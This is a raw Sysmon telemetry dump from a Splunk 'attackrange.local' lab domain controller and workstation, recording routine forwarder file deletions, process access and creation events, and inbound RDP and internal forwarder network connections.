AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC93187AB28C1B2794FA88ECB22726A0,SHA256=79DB1164AD99A4D3BE80BA33FDBAB85B54F672BDD7E731EC7F0170BDFE0EDC7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976209Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:55.386{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54746E5F837E971B2882CD38AE520070,SHA256=DD86064F3971E780AE63F36A331822BA18EE6DF2C5A8DDC24129735CEA502219,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.047{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2F71A61774769A3C1DD8D8DE78610A9,SHA256=5EE77537F07B28561EBCC8FA39DFC0A4A18DCD1123B198268832C136B28814D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:55.047{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=10DDC75917943FD2A26F7434FE7AF40F,SHA256=E64C93E2223CD8A7AEA9EEAFB524EAB53F116A08D94A223A17CF6B72925F5125,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976208Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:55.261{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B6449425B7C436EADE3EE0A4256EC0D,SHA256=C8646AF6E26FDC383C0A9DD003EA1E2201386655406FE7151990D31B6079652E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976210Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:56.386{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BF8F53963317198AF04220ADBACEE09,SHA256=AAA5CF0A15047815F1C003058A9EF8224C96BA086CD51D0DA36A3AFADF0BFD69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:56.417{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2F71A61774769A3C1DD8D8DE78610A9,SHA256=5EE77537F07B28561EBCC8FA39DFC0A4A18DCD1123B198268832C136B28814D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:56.364{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEC995D73A4B834F78BA6F722402FC57,SHA256=6F2A0FA39C664A7B98EAE533BEACB59B7D2BD4F35BB59C0129D7A36EA990610A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:56.117{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-880C-6151-E479-00000000FC01}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:56.117{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:56.117{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:56.117{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:56.117{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:56.117{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-880C-6151-E479-00000000FC01}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:56.117{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-880C-6151-E479-00000000FC01}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:56.102{5EBD8912-880C-6151-E479-00000000FC01}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976211Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:57.402{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F227D79920CA69325980A199FB3B74FE,SHA256=9F68A813AABBF37D83C040B13D283F53E4B3197EE362A0DF25F830A0936AA7D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:57.531{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18C524BE0E76B2EC6311291CF98E8B9C,SHA256=3481B0EFD85F5011C7E1C87B979EA98389BC70315926912B22AE4AF2B102A981,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.707{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62111-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001047692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:54.389{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61903-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001047691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:57.147{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000976214Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:55.827{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59242-false10.0.1.12-8000- 354300x8000000000000000976213Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:55.217{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-2742-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976212Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:58.464{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA719FA2F990E26823476FFB79813E5E,SHA256=BFD0A57EEE41371F41D483FB70F6B9CCC265926301D4007CFF67A6826B058ED8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:58.561{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40AD361131F358A50637068041DA0E27,SHA256=68C330C321A41B24F1FFC929249EFBB2069EA0EB175D090DF4F24ED401C22B7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976215Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:59.589{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03D20897047905CD6F387AA55A5D2165,SHA256=61AA9425DE482B3467109135202AEAF6A1AD672A7FC3767413FCE123B52BD9F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:59.598{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9E4E3D1821C7CA3042F17EDB0041E08,SHA256=B14D2D5F59051A3D316B4CCD3D7E200B87B6C5BFC53BBEC3BD7D7184B0C1F92B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:00.812{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB8132F0A42B628CCDB707290EC432A8,SHA256=C38B6577729E469B9359544042E4E7A2ECAF8EFAF5AADA39F703BD920D39FDCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:00.628{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8936EF274D633C26FEC4E983684D9CC,SHA256=554D99C4219CC96A6D7B94B877F278D3BB9F953255490D3AB063AD0B66DB8E8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976216Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:00.808{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1381FC0048A51DCCED0821BB0176B327,SHA256=BE6D2DC07ED28354AFB582657CCE50A47AC55CEBC14B937BD61E222A879D5D74,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:57.837{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49201-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:01.658{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AB84A1CD27850AE7FA6FB303A9C99CB,SHA256=2AACE4F306C321B1CDE2FF8DA85FBCED064CBD08C9219B66D847C83180F39163,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:59.161{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63897-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000976218Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:01.370{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD2ED0A2A56A4ED02A750DB34F64EDDF,SHA256=8DAB2CDF8FD69CC2607BE20A1E0D5FB7FC7CD490A2B65A14D349BC4FC866211E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976217Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:01.370{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1F0256F7ACA4A5563823158C51B1882,SHA256=1F9D3B8D1B4B4BE0AE77F9A9816058848481A7C70B80E7504EF024B021BA87D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:02.842{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=681D9ACA852F7D52CE682C277826F3B2,SHA256=4A33B91FFC8B15D46167782683B7018A7AF4880AA5AF0C980494A8624FF6043C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:02.677{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=865C58A3696D88BDC5C63EAD83249B8A,SHA256=F7101B776A1510BFDA3AF5D0594F27D448E2685F1FA6F2928BE42BC9A1B2971F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976219Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:02.027{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDDD8B8AD9C97C66AC076FC1D6734D0B,SHA256=CEDE2C9FECED025389F7FFC5DFB370AF5A3F37F111E2DB78059FFB8F8944D6F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:03.695{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=453A80FBC6E1FC2024C1471DC8774F14,SHA256=D3B2B4EFDDF0B2D8352DF2CB88D8A9DBBAF7EB27795AA67812B3BAB73B6DB859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976220Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:03.232{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5C91BAF383089F1F41B15CBC29D72C4,SHA256=3AC0E45AA546DA8DBDC09BE055AD99A956D9E8154C0AF11E4DD32EF63749D273,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047706Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:01.204{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49710-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047705Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:04.709{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB4ABC865A8A6DD86F8B4F698646588F,SHA256=123F06D11DA140BD516FB30E1811E5BCA539A207CE9FA18A809AD5D35E3F4D3B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976223Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:01.829{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59243-false10.0.1.12-8000- 354300x8000000000000000976222Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:01.298{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-38510-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976221Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:04.232{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=734ECB26B278D2BD6945F99BB697B66D,SHA256=5700390584E7395EA32D6276C1F1D98930A94A885A3E69098F68CC330A3190EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047708Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:02.849{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49202-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047707Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:05.740{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D10F25B02217C66408489168EC94283,SHA256=E2D18D51A0D4F3156F86A875A4E43C2B20C9071E00E31FC1FF8467AA997A9A33,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976226Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 